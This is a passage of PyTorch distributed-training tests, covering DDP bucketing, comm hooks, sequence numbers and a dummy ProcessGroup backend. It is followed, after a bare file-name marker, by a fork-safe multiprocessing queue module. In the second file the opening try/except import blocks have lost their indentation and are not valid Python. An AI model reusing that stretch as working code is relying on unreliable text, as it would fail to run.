    ):
        # Build a plain Net and a DDP-wrapped deep copy of it on one device,
        # plus a shared random input/target batch.
        model = Net()
        device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
        ddp_model = DistributedDataParallel(
            copy.deepcopy(model).to(device),
            device_ids=device_ids,
            process_group=process_group,
            # Tiny bucket cap forces many buckets, stressing bucketing logic.
            bucket_cap_mb=0.001,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )
        model.to(device)

        input = torch.randn(global_batch_size, 2).to(device)
        target = torch.randn(global_batch_size, 4).to(device)

        return model, ddp_model, input, target

    def _prepare_multi_device_module(
        self,
        process_group,
        devices,
        device_ids,
        global_batch_size,
        gradient_as_bucket_view=False,
    ):
        # Same as above, but the reference model spans 2 or 4 devices.
        self.assertTrue(
            len(devices) == 2 or len(devices) == 4,
            "unexpected devices for ddp tests {}".format(devices),
        )
        if len(devices) == 2:
            model = DoubleGpuNet(devices)
        elif len(devices) == 4:
            model = QuadraGpuNet(devices)

        ddp_model = DistributedDataParallel(
            copy.deepcopy(model),
            device_ids=device_ids,
            process_group=process_group,
            bucket_cap_mb=0.001,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )

        input = torch.randn(global_batch_size, 2).cuda(devices[0])
        target = torch.randn(global_batch_size, 4)

        return model, ddp_model, input, target

    def _test_ddp_with_process_group(
        self,
        process_group,
        devices,
        device_ids,
        multi_device=False,
        gradient_as_bucket_view=False,
    ):
        """
        Note: we pass down `device_ids` all the way to DistributedDataParallel
        as part of the test. Below you find tests that either use a list of
        integers, a list of `torch.Device` instances, or an empty list.
        The `devices` argument is used to control placement of the model and
        must always be specified as list of `torch.Device` instances.
        """
        local_batch_size = 1 if devices is None else len(devices)
        global_batch_size = self.world_size * local_batch_size

        if multi_device:
            model, ddp_model, input, target = self._prepare_multi_device_module(
                process_group,
                devices,
                device_ids,
                global_batch_size,
                gradient_as_bucket_view,
            )
            ddp_logging_data = ddp_model._get_ddp_logging_data()
            self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
        else:
            model, ddp_model, input, target = self._prepare_single_device_module(
                process_group,
                devices,
                device_ids,
                global_batch_size,
                gradient_as_bucket_view,
            )
            ddp_logging_data = ddp_model._get_ddp_logging_data()
            self.assertFalse(ddp_logging_data.get("is_multi_device_module"))

        def step_model(model, input, target):
            # One forward/backward pass (no optimizer step).
            model.train()
            output = model(input)
            loss = F.mse_loss(output, target.to(output.device))
            loss.backward()

        def update_parameters(model):
            # Manual SGD with lr=1, then clear grads.
            for param in model.parameters():
                with torch.no_grad():
                    param -= param.grad
                param.grad = None

        # check two model parameters over 2 iterations
        for iteration in range(2):
            # single cpu/gpu training
            step_model(model, input, target)

            # DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
            step_model(
                ddp_model,
                input[
                    self.rank * local_batch_size : (self.rank + 1) * local_batch_size
                ],
                target[
                    self.rank * local_batch_size : (self.rank + 1) * local_batch_size
                ],
            )

            # Update weights and run a second iteration to shake out errors
            update_parameters(model)
            update_parameters(ddp_model)
            # After averaging, DDP parameters must match the reference model.
            self.assertEqual(
                len(list(model.parameters())), len(list(ddp_model.parameters()))
            )
            for i, j in zip(model.parameters(), ddp_model.parameters()):
                self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)

            # Shuffle the input so that DDP input is different
            torch.manual_seed(1337 + iteration)
            input = input[torch.randperm(global_batch_size)]

    def _gpu_model_with_ddp_comm_hook(
        self, process_group, hook=None, gradient_as_bucket_view=False, state=None
    ):
        # DDP model on this rank's first GPU, optionally with a Python comm hook.
        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        gpu_model = DistributedDataParallel(
            ModuleForDdpCommHook().to(device_id),
            device_ids=[device_id],
            process_group=process_group,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )

        # Register a DDP communication hook if any.
        if hook is not None:
            gpu_model.register_comm_hook(state, hook)

        return gpu_model

    def _gpu_model_with_builtin_ddp_comm_hook(
        self, process_group, hook=None, gradient_as_bucket_view=False
    ):
        # Same as above but using DDP's built-in (C++) hook registration.
        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        gpu_model = DistributedDataParallel(
            ModuleForDdpCommHook().to(device_id),
            device_ids=[device_id],
            process_group=process_group,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )

        # Register a built-in DDP communication hook if defined
        if hook is not None:
            gpu_model._register_builtin_comm_hook(hook)

        return gpu_model

    def _run_and_verify_hook(self, model, input, expected_grad):
        # Run forward
        output = model(input, self.rank)

        # Run backward
        output.mean().backward()

        [self.assertEqual(p.grad, expected_grad) for p in model.parameters()]

    def _simple_hook(
        self, state: object, bucket: dist.GradBucket
    ) -> torch.futures.Future[torch.Tensor]:
        # Comm hook that ignores the real gradients: resolves to all-ones,
        # then fut_then adds one more, so every grad ends up all twos.
        fut = torch.futures.Future()
        fut.set_result(torch.ones_like(bucket.buffer()))

        def fut_then(fut):
            # Add ones to fut's result.
            t = fut.value()
            return t + torch.ones_like(t)

        return fut.then(fut_then)
class DistributedDataParallelTest(
    AbstractDistributedDataParallelTest, MultiProcessTestCase
):
    def setUp(self):
        super(DistributedDataParallelTest, self).setUp()
        self._spawn_processes()

    def test_invalid_powerSGD_state(self):
        # PowerSGD requires start_powerSGD_iter > 1 whenever error feedback
        # or warm start is enabled; every such combination must raise.
        for start_powerSGD_iter, use_error_feedback, warm_start in product(
            [0, 1], [True, False], [True, False]
        ):
            if not use_error_feedback and not warm_start:
                continue
            with self.assertRaisesRegex(
                ValueError,
                "Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
                "because PowerSGD can only be applied after the first two iterations in DDP.",
            ):
                state = powerSGD.PowerSGDState(
                    process_group=None,
                    matrix_approximation_rank=1,
                    start_powerSGD_iter=start_powerSGD_iter,
                    use_error_feedback=use_error_feedback,
                    warm_start=warm_start,
                )
class ComputeBucketAssignmentTest(TestCase):
    # Unit tests for dist._compute_bucket_assignment_by_size, which groups
    # tensors into gradient buckets by dtype under per-bucket byte limits.
    def test_single_limit_single_dtype(self):
        tensors = [
            torch.empty([100], dtype=torch.float),
            torch.empty([200], dtype=torch.float),
            torch.empty([100], dtype=torch.float),
            torch.empty([50], dtype=torch.float),
        ]
        result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
            tensors, [400]
        )
        self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
        # 400-byte cap => each 100-float tensor already fills a bucket.
        self.assertEqual([[0], [1], [2], [3]], result)

    def test_single_limit_multi_dtype(self):
        tensors = [
            torch.empty([50], dtype=torch.float),
            torch.empty([25], dtype=torch.double),
            torch.empty([50], dtype=torch.float),
            torch.empty([25], dtype=torch.double),
            torch.empty([50], dtype=torch.float),
            torch.empty([25], dtype=torch.double),
        ]
        result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
            tensors, [400]
        )
        self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
        # Buckets never mix dtypes: floats and doubles are grouped separately.
        self.assertEqual([[0, 2], [1, 3], [4], [5]], result)

    def test_multi_limit_single_dtype(self):
        tensors = [
            torch.empty([10], dtype=torch.float),
            torch.empty([10], dtype=torch.float),
            torch.empty([10], dtype=torch.float),
            torch.empty([10], dtype=torch.float),
        ]
        result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
            tensors, [40, 80]
        )
        # First bucket uses the first (smaller) limit; later ones use the last.
        self.assertEqual(per_bucket_size_limits, [40, 80, 80])
        self.assertEqual([[0], [1, 2], [3]], result)

    def test_multi_limit_multi_dtype(self):
        tensors = [
            torch.empty([50], dtype=torch.float),
            torch.empty([25], dtype=torch.double),
            torch.empty([50], dtype=torch.float),
            torch.empty([25], dtype=torch.double),
            torch.empty([50], dtype=torch.float),
            torch.empty([25], dtype=torch.double),
        ]
        result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
            tensors, [200, 400]
        )
        self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
        self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
    # Mixin with sequence-number and out-of-group-warning checks shared by
    # backend-specific subclasses (which supply self.rank / self.file_name).
    @property
    def op_timeout_sec(self):
        return 1

    @property
    def world_size(self):
        return 2

    def _verify_sequence_number_across_pg(self, pg, verify_pg):
        # Gather pg's sequence number from all ranks and assert they agree.
        seq_num = pg._get_sequence_number_for_group()
        obj_list = [None for _ in range(dist.get_world_size(verify_pg))]

        # We use a separate pg to verify the sequence numbers, otherwise these
        # collectives will themselves increment the sequence number.
        dist.all_gather_object(obj_list, seq_num, group=verify_pg)
        self.assertEqual(len(set(obj_list)), 1)
        return obj_list[0]

    def _test_sequence_num_incremented(self, process_group, ranks):
        # verify initial sequence numbers. Use a distinct process group for
        # verification to keep counts as expected with respect to process_group.
        verify_pg = dist.new_group(
            ranks=ranks,
            backend="gloo",
        )
        assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)

        initial_num = (
            self._verify_sequence_number_across_pg(
                pg=process_group, verify_pg=verify_pg
            )
            if not c10d._rank_not_in_group(process_group)
            else -1
        )

        # Verify sequence numbers are appropriately incremented
        for i in range(10):
            t = torch.ones(1, device=torch.cuda.current_device())
            dist.all_reduce(t, group=process_group)
            if not c10d._rank_not_in_group(process_group):
                seq_num = self._verify_sequence_number_across_pg(
                    pg=process_group,
                    verify_pg=verify_pg,
                )
                self.assertEqual(initial_num + i + 1, seq_num)

        if dist.get_world_size(process_group) > 2:
            # Test when certain ranks don't call collectives
            if dist.get_rank(process_group) not in [0, 2]:
                dist.all_reduce(t, group=process_group, async_op=True)
            # Now ranks 0 and 2 should be lagging by 1.
            if not c10d._rank_not_in_group(process_group):
                seq_num = process_group._get_sequence_number_for_group()
                rank = dist.get_rank(process_group)
                obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
                dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
                rank_to_seq_num = {rank: num for (rank, num) in obj_list}
                self.assertEqual(len(set(rank_to_seq_num.values())), 2)
                self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
                expected_same = {
                    rank_to_seq_num[i]
                    for i in rank_to_seq_num.keys()
                    if i not in [0, 2]
                }
                self.assertEqual(len(expected_same), 1)
                self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])

    def _test_sequence_num_incremented_default_group(self, backend_name):
        torch.cuda.set_device(self.rank)
        store = dist.FileStore(self.file_name, self.world_size)
        dist.init_process_group(
            backend_name,
            world_size=self.world_size,
            rank=self.rank,
            store=store,
        )
        self._test_sequence_num_incremented(
            c10d._get_default_group(),
            ranks=list(i for i in range(dist.get_world_size())),
        )

    def _test_sequence_num_incremented_subgroup(self, backend_name):
        torch.cuda.set_device(self.rank)
        store = dist.FileStore(self.file_name, self.world_size)
        dist.init_process_group(
            backend_name,
            world_size=self.world_size,
            rank=self.rank,
            store=store,
        )
        subgroup_ranks = [0, 1, 2]
        subgroup = dist.new_group(subgroup_ranks)
        self._test_sequence_num_incremented(subgroup, subgroup_ranks)

    def _test_sequence_num_set_default_pg(self, backend):
        # A fresh default group starts with one agreed-upon sequence number.
        store = dist.FileStore(self.file_name, self.world_size)
        dist.init_process_group(
            backend,
            world_size=self.world_size,
            rank=self.rank,
            store=store,
        )
        default_pg = c10d._get_default_group()
        seq_num = default_pg._get_sequence_number_for_group()
        obj_list = [None for _ in range(dist.get_world_size())]
        dist.all_gather_object(obj_list, seq_num)
        self.assertEqual(len(set(obj_list)), 1)

    def _test_sequence_num_set_new_group(self, backend):
        store = dist.FileStore(self.file_name, self.world_size)
        dist.init_process_group(
            backend,
            world_size=self.world_size,
            rank=self.rank,
            store=store,
        )
        subgroup = dist.new_group([0, 1])

        if not c10d._rank_not_in_group(subgroup):
            subgroup_seq = subgroup._get_sequence_number_for_group()
            obj_list = [None for _ in range(dist.get_world_size(subgroup))]
            dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
            self.assertEqual(len(set(obj_list)), 1)

    def _test_warn_not_in_group(self, backend):
        store = dist.FileStore(self.file_name, self.world_size)
        dist.init_process_group(
            backend,
            world_size=self.world_size,
            rank=self.rank,
            store=store,
        )
        # Even-numbered ranks form the group; odd ranks stay outside it.
        in_group_ranks = list(filter(lambda x: x % 2 == 0, range(self.world_size)))
        group = dist.new_group(in_group_ranks)

        x = torch.zeros(2, 2).cuda(self.rank)
        xs = [torch.zeros(2, 2).cuda(self.rank) for _ in range(len(in_group_ranks))]
        if self.rank not in in_group_ranks:
            # Out-of-group ranks must get a UserWarning, not a hang or crash.
            msg = ".*{}.*does not belong to.*"
            with self.assertWarnsOnceRegex(UserWarning, msg.format("all_gather")):
                dist.all_gather(xs, x, group=group)
            with self.assertWarnsOnceRegex(UserWarning, msg.format("all_reduce")):
                dist.all_reduce(x, group=group)
            with self.assertWarnsOnceRegex(UserWarning, msg.format("barrier")):
                dist.barrier(group=group)
            with self.assertWarnsOnceRegex(UserWarning, msg.format("broadcast")):
                dist.broadcast(x, src=0, group=group)
        else:
            dist.all_gather(xs, x, group=group)
            dist.all_reduce(x, group=group)
            dist.barrier(group=group)
            dist.broadcast(x, src=0, group=group)
class CommTest(AbstractCommTest, MultiProcessTestCase):
    def setUp(self):
        super(CommTest, self).setUp()
        self._spawn_processes()

    def tearDown(self):
        super(CommTest, self).tearDown()
        # The FileStore backing file may outlive a crashed worker;
        # removal is best-effort.
        try:
            os.remove(self.file_name)
        except OSError:
            pass

    def test_distributed_debug_mode(self):
        # Default should be off
        default_debug_mode = dist._get_debug_mode()
        self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
        mapping = {
            "OFF": dist._DistributedDebugLevel.OFF,
            "INFO": dist._DistributedDebugLevel.INFO,
            "DETAIL": dist._DistributedDebugLevel.DETAIL,
        }
        invalid_debug_modes = ["foo", 0, 1, -1]

        # Every valid TORCH_DISTRIBUTED_DEBUG value maps to its enum level.
        for mode in mapping.keys():
            os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
            set_debug_mode = dist._get_debug_mode()
            self.assertEqual(
                set_debug_mode,
                mapping[mode],
                f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
            )

        # Anything else must raise rather than being silently ignored.
        for mode in invalid_debug_modes:
            os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
            with self.assertRaisesRegex(RuntimeError, "to be one of"):
                dist._get_debug_mode()
class DummyWork(dist._Work):
    # Minimal Work handle: pretends the collective completed successfully.
    def wait(self, timeout=5.0):
        # Mimic a real wait by syncing the current CUDA stream when available;
        # the timeout argument is accepted for API compatibility but unused.
        if torch.cuda.is_available():
            torch.cuda.current_stream().synchronize()
        return True
class DummyProcessGroup(dist.ProcessGroup):
    # Fake pure-Python backend. Each collective mutates its tensors with a
    # recognizable constant (+1 for broadcast/send, +2 for allreduce/recv)
    # so tests can verify which operation was routed to the backend.
    def getBackendName(self):
        return "Dummy"

    def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
        # "Gather" by copying this rank's own input into every output slot.
        for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
            for output_tensor in output_tensor_list:
                output_tensor.copy_(input_tensor)

        return DummyWork()

    def allreduce(self, tensor_list, opts=None):
        # Marker: allreduce adds 2 in place.
        for tensor in tensor_list:
            tensor.add_(2)

        return DummyWork()

    def barrier(self, opts=None):
        store = c10d._get_default_store()
        key = "TEST:DummyProcessGroup:barrier"
        if self.rank() == 0:
            worker_count = 0
            # By default, TCPServer lives on rank 0. So rank 0 needs to make
            # sure that it does not exit too early before other ranks finish
            # using the store.
            # Note that, _store_based_barrier does not solve this problem, as
            # all ranks need to run at least one store.add(key, 0) before
            # exiting, but there is no guarantee that rank 0 is still alive at
            # that point.
            while worker_count < self.size() - 1:
                worker_count = store.add(key, 0)
        else:
            store.add(key, 1)

        return DummyWork()

    def broadcast(self, tensor_list, opts=None):
        # Marker: broadcast adds 1 in place.
        for tensor in tensor_list:
            tensor.add_(1)

        return DummyWork()

    def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
        # Each rank keeps the element of the input list at its own index.
        for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
            output_tensor.copy_(input_tensor_list[self.rank()])

        return DummyWork()

    def send(self, tensor_list, dst, tag=0):
        # Marker: send adds 1 in place.
        for tensor in tensor_list:
            tensor.add_(1)

        return DummyWork()

    def recv(self, tensor_list, src, tag=0):
        # Marker: recv adds 2 in place.
        for tensor in tensor_list:
            tensor.add_(2)

        return DummyWork()
class PythonProcessGroupExtensionTest(MultiProcessTestCase):
    # Exercises registering and using a pure-Python ProcessGroup backend
    # ("dummy", backed by DummyProcessGroup above).
    def setUp(self):
        super(PythonProcessGroupExtensionTest, self).setUp()
        self._spawn_processes()

    def tearDown(self):
        super(PythonProcessGroupExtensionTest, self).tearDown()
        try:
            os.remove(self.file_name)
        except OSError:
            pass

    def test_get_backend_name(self):
        dpg = DummyProcessGroup(0, 1)
        self.assertEqual("Dummy", dpg.name())

    def test_backend_class_attr(self):
        dist.Backend.register_backend(
            "dummy",
            PythonProcessGroupExtensionTest.create_dummy
        )
        # Registration upper-cases the backend name and records the creator.
        self.assertEqual(dist.Backend.DUMMY, "DUMMY")
        self.assertEqual(
            dist.Backend._plugins["DUMMY"],
            PythonProcessGroupExtensionTest.create_dummy
        )

    @staticmethod
    def create_dummy(store, rank, size, timeout):
        # Factory passed to register_backend; store and timeout are unused
        # by the dummy backend.
        return DummyProcessGroup(rank, size)

    def test_collectives(self):
        dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)

        os.environ['MASTER_ADDR'] = 'localhost'
        os.environ['MASTER_PORT'] = '6789'
        dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)

        # test all_gather
        input_tensor = torch.ones(2, 2) * 7
        output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
        dist.all_gather(output_tensor_list, input_tensor)

        for tensor in output_tensor_list:
            self.assertEqual(tensor, input_tensor)

        # test all_reduce (dummy backend adds 2 in place)
        input_tensor = torch.ones(2, 2) * 7
        dist.all_reduce(input_tensor)
        self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)

        # test broadcast (dummy backend adds 1 in place)
        input_tensor = torch.zeros(2, 2)
        dist.broadcast(input_tensor, 0, async_op=True).wait()
        self.assertEqual(torch.ones(2, 2), input_tensor)

        # test reduce_scatter (dummy backend keeps this rank's slice)
        output_tensor = torch.zeros(2, 2)
        input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
        dist.reduce_scatter(output_tensor, input_tensor_list)
        self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)

        dist.barrier()
        dist.destroy_process_group()

    def test_send_recv(self):
        dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)

        os.environ['MASTER_ADDR'] = 'localhost'
        os.environ['MASTER_PORT'] = '6789'
        dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)

        # test send (dummy backend adds 1 in place)
        input_tensor = torch.zeros(2, 2)
        dist.send(input_tensor, (self.rank + 1) % self.world_size)
        self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)

        # test recv (dummy backend adds 2 in place)
        input_tensor = torch.zeros(2, 2)
        dist.recv(input_tensor, (self.rank + 1) % self.world_size)
        self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)

        dist.barrier()
        # intentionally not calling into `destroy_process_group` as not all
        # user applications would explicitly that.
if __name__ == "__main__":
    # Sanity guard: the assert message states the contract — CUDA must not be
    # initialized in the main process before the tests spawn worker processes.
    assert (
        not torch.cuda._initialized
    ), "test_distributed must not have initialized CUDA context on main process"
    run_tests()
|
mp.py | import os
import pickle
import struct
import sys
from functools import partial
from multiprocessing import Lock, Semaphore, Event as ProcessEvent
from threading import Thread, Event as TrEvent, RLock as ThreadRLock
from time import sleep, time
from typing import List, Dict, Optional
from multiprocessing import Process
import psutil
from six.moves.queue import Empty, Queue as TrQueue
from ..py3_interop import AbstractContextManager
try:
from multiprocessing import SimpleQueue
except ImportError:
from multiprocessing.queues import SimpleQueue
# Windows/MacOS compatibility
try:
from multiprocessing.context import ForkContext # noqa
except ImportError:
ForkContext = None
# PY2 compatibility
try:
from multiprocessing import get_context
except ImportError:
def get_context(*args, **kwargs):
return False
class _ForkSafeThreadSyncObject(object):
    """Base for synchronization primitives that are lazily (re)created after a fork.

    The wrapped primitive (built by ``functor``) is created on first use and
    re-created whenever the current PID differs from the PID that created it,
    so a forked child never reuses the parent's primitive.
    """

    def __init__(self, functor):
        # functor: zero-argument callable producing the underlying sync object
        self._sync = None
        self._instance_pid = None
        self._functor = functor

    def _create(self):
        # this part is not atomic, and there is not a lot we can do about it.
        if self._instance_pid != os.getpid() or not self._sync:
            # Notice! This is NOT atomic: the first time this is accessed, two
            # concurrent calls might end up overwriting each other's object.
            # Even though it sounds horrible, the worst case in our usage
            # scenario is that the first call's usage is not "atomic".
            # Notice the order! We first create the object and THEN update the
            # pid; this is so whatever happens we never try to use the old
            # (pre-fork copy of the) synchronization object.
            self._sync = self._functor()
            self._instance_pid = os.getpid()
class ForkSafeRLock(_ForkSafeThreadSyncObject):
    """Fork-safe re-entrant lock: the underlying RLock is rebuilt after a fork."""

    def __init__(self):
        super(ForkSafeRLock, self).__init__(ThreadRLock)

    def acquire(self, *args, **kwargs):
        self._create()
        return self._sync.acquire(*args, **kwargs)

    def release(self, *args, **kwargs):
        if self._sync is None:  # never created, nothing to release
            return None
        self._create()
        return self._sync.release(*args, **kwargs)

    def __enter__(self):
        """Acquire the lock and return `self`."""
        self.acquire()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Release the lock; exceptions from the body propagate."""
        self.release()
class ForkSemaphore(_ForkSafeThreadSyncObject):
    """Fork-safe semaphore: the underlying Semaphore is rebuilt after a fork."""

    def __init__(self, value=1):
        super(ForkSemaphore, self).__init__(functor=partial(Semaphore, value))

    def acquire(self, *args, **kwargs):
        self._create()
        return self._sync.acquire(*args, **kwargs)

    def release(self, *args, **kwargs):
        if self._sync is None:  # never created, nothing to release
            return None
        self._create()
        return self._sync.release(*args, **kwargs)

    def get_value(self):
        self._create()
        return self._sync.get_value()

    def __enter__(self):
        """Acquire the semaphore and return `self`."""
        self.acquire()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Release the semaphore; exceptions from the body propagate."""
        self.release()
class ForkEvent(_ForkSafeThreadSyncObject):
    """Fork-safe threading.Event: recreated transparently in a forked child."""

    def __init__(self):
        super(ForkEvent, self).__init__(TrEvent)

    def set(self):
        self._create()
        return self._sync.set()

    def clear(self):
        if self._sync is None:  # never created means it is already "cleared"
            return None
        self._create()
        return self._sync.clear()

    def is_set(self):
        self._create()
        return self._sync.is_set()

    def wait(self, *args, **kwargs):
        self._create()
        return self._sync.wait(*args, **kwargs)
class ForkQueue(_ForkSafeThreadSyncObject):
    """Fork-safe thread queue: the underlying queue is recreated after a fork."""

    def __init__(self):
        super(ForkQueue, self).__init__(TrQueue)

    def get(self, *args, **kwargs):
        self._create()
        return self._sync.get(*args, **kwargs)

    def put(self, *args, **kwargs):
        self._create()
        return self._sync.put(*args, **kwargs)

    def empty(self):
        # an uncreated queue is trivially empty
        if not self._sync:
            return True
        self._create()
        return self._sync.empty()

    def full(self):
        # an uncreated queue cannot be full
        if not self._sync:
            return False
        self._create()
        return self._sync.full()

    def close(self):
        if not self._sync:
            return
        self._create()
        # NOTE(review): the wrapped TrQueue (a standard queue.Queue) has no
        # close() method, so this line would raise AttributeError if reached
        # with a created queue — confirm intended target type.
        return self._sync.close()
class ThreadCalls(object):
    """Single background daemon thread executing queued (func, args) calls in FIFO order.

    A ``None`` item pushed onto the queue is the shutdown sentinel.
    """

    def __init__(self):
        self._queue = ForkQueue()
        self._thread = Thread(target=self._worker)
        self._thread.daemon = True
        self._thread.start()

    def is_alive(self):
        # True while the worker thread exists and has not exited
        return bool(self._thread) and self._thread.is_alive()

    def apply_async(self, func, args=None):
        # queue a call for background execution; False if func is falsy
        if not func:
            return False
        self._queue.put((func, args))
        return True

    def close(self, timeout=5.):
        t = self._thread
        if not t:
            return
        try:
            # push something into queue so it knows this is the end
            self._queue.put(None)
            # wait for the thread; it should not take long, so we have a 5 second timeout
            # the background thread itself is doing nothing but push into a queue, so it should not take long
            t.join(timeout=timeout)
        except BaseException:  # noqa
            pass
        # mark thread is done
        self._thread = None

    def _worker(self):
        # drain the queue until the None sentinel arrives
        while True:
            try:
                request = self._queue.get(block=True, timeout=1.0)
                if not request:
                    break
            except Empty:
                continue
            # noinspection PyBroadException
            try:
                if request[1]:
                    request[0](*request[1])
                else:
                    request[0]()
            except Exception:
                # best-effort execution: a failing call must not kill the worker
                pass
        self._thread = None
class SingletonThreadPool(object):
    """Per-process singleton ThreadCalls pool, rebuilt transparently after a fork."""

    __thread_pool = None
    __thread_pool_pid = None

    @classmethod
    def get(cls):
        # a PID mismatch means we are in a fresh (forked) process: rebuild the pool
        if cls.__thread_pool_pid != os.getpid():
            cls.__thread_pool = ThreadCalls()
            cls.__thread_pool_pid = os.getpid()
        return cls.__thread_pool

    @classmethod
    def clear(cls):
        pool = cls.__thread_pool
        if pool:
            pool.close()
        cls.__thread_pool = None
        cls.__thread_pool_pid = None

    @classmethod
    def is_active(cls):
        # truthy only when the pool exists, belongs to this process, and its worker runs
        return (
            cls.__thread_pool
            and cls.__thread_pool_pid == os.getpid()
            and cls.__thread_pool.is_alive()
        )
class SafeQueue(object):
    """
    Many writers Single Reader multiprocessing safe Queue
    """
    __thread_pool = SingletonThreadPool()

    def __init__(self, *args, **kwargs):
        # background reader moves items from the process queue to a thread queue;
        # created lazily on the first get()
        self._reader_thread = None
        self._reader_thread_started = False
        # Fix the python Queue and Use SimpleQueue write so it uses a single OS write,
        # making it atomic message passing
        self._q = SimpleQueue(*args, **kwargs)
        # noinspection PyBroadException
        try:
            # replace the pipe writer's send so header+payload go out in one OS write
            # noinspection PyUnresolvedReferences,PyProtectedMember
            self._q._writer._send_bytes = partial(SafeQueue._pipe_override_send_bytes, self._q._writer)
        except Exception:
            pass
        self._internal_q = None
        self._q_size = []  # list of PIDs we pushed, so this is atomic

    def empty(self):
        # empty only if both the process queue and the internal thread queue are empty
        return self._q.empty() and (not self._internal_q or self._internal_q.empty())

    def is_pending(self):
        # check if we have pending requests to be pushed (it does not mean they were pulled)
        # only call from main put process
        return self._get_q_size_len() > 0

    def close(self, event, timeout=3.0):
        # wait until all pending requests pushed
        tic = time()
        pid = os.getpid()
        prev_q_size = self._get_q_size_len(pid)
        while self.is_pending():
            if event:
                event.set()
            if not self.__thread_pool.is_active():
                break
            sleep(0.1)
            # timeout is for the maximum time to pull a single object from the queue,
            # this way if we get stuck we notice quickly and abort
            if timeout and (time()-tic) > timeout:
                if prev_q_size == self._get_q_size_len(pid):
                    break
                else:
                    prev_q_size = self._get_q_size_len(pid)
                    tic = time()

    def get(self, *args, **kwargs):
        # single-reader side: pull one deserialized object
        return self._get_internal_queue(*args, **kwargs)

    def batch_get(self, max_items=1000, timeout=0.2, throttle_sleep=0.1):
        # pull up to max_items objects, waiting at most `timeout` while empty
        buffer = []
        timeout_count = int(timeout/throttle_sleep)
        empty_count = timeout_count
        while len(buffer) < max_items:
            while not self.empty() and len(buffer) < max_items:
                try:
                    buffer.append(self._get_internal_queue(block=False))
                    empty_count = 0
                except Empty:
                    break
            empty_count += 1
            if empty_count > timeout_count or len(buffer) >= max_items:
                break
            sleep(throttle_sleep)
        return buffer

    def put(self, obj):
        # not atomic when forking for the first time
        # GIL will make sure it is atomic
        self._q_size.append(os.getpid())
        # make sure the block put is done in the thread pool i.e. in the background
        obj = pickle.dumps(obj)
        if BackgroundMonitor.get_at_exit_state():
            # at exit we cannot rely on the background pool; push synchronously
            self._q_put(obj)
            return
        self.__thread_pool.get().apply_async(self._q_put, args=(obj, ))

    def _get_q_size_len(self, pid=None):
        # number of pending pushes issued by `pid` (default: current process)
        pid = pid or os.getpid()
        return len([p for p in self._q_size if p == pid])

    def _q_put(self, obj):
        try:
            self._q.put(obj)
        except BaseException:
            # make sure we zero the _q_size if the queue put fails (i.e. the process dies)
            self._q_size = []
            raise
        pid = os.getpid()
        # GIL will make sure it is atomic
        # pop the First "counter" that is ours (i.e. pid == os.getpid())
        p = None
        while p != pid:
            p = self._q_size.pop()

    def _init_reader_thread(self):
        # lazily create the internal queue and the daemon feeding it
        if not self._internal_q:
            self._internal_q = ForkQueue()
        if not self._reader_thread or not self._reader_thread.is_alive():
            # read before we start the thread
            self._reader_thread = Thread(target=self._reader_daemon)
            self._reader_thread.daemon = True
            self._reader_thread.start()
            # if we have waiting results
            # wait until thread is up and pushed some results
            while not self._reader_thread_started:
                sleep(0.2)
            # just in case make sure we pulled some stuff if we had any
            # todo: wait until a queue is not empty, but for some reason that might fail
            sleep(1.0)

    def _get_internal_queue(self, *args, **kwargs):
        self._init_reader_thread()
        obj = self._internal_q.get(*args, **kwargs)
        # deserialize
        return pickle.loads(obj)

    def _reader_daemon(self):
        self._reader_thread_started = True
        # pull from process queue and push into thread queue; None is the stop sentinel
        while True:
            # noinspection PyBroadException
            try:
                obj = self._q.get()
                if obj is None:
                    break
            except Exception:
                break
            self._internal_q.put(obj)

    @staticmethod
    def _pipe_override_send_bytes(self, buf):
        # NOTE: bound onto the pipe writer via partial, so `self` here is the Connection
        n = len(buf)
        # For wire compatibility with 3.2 and lower
        header = struct.pack("!i", n)
        # Issue #20540: concatenate before sending, to avoid delays due
        # to Nagle's algorithm on a TCP socket.
        # Also note we want to avoid sending a 0-length buffer separately,
        # to avoid "broken pipe" errors if the other end closed the pipe.
        self._send(header + buf)
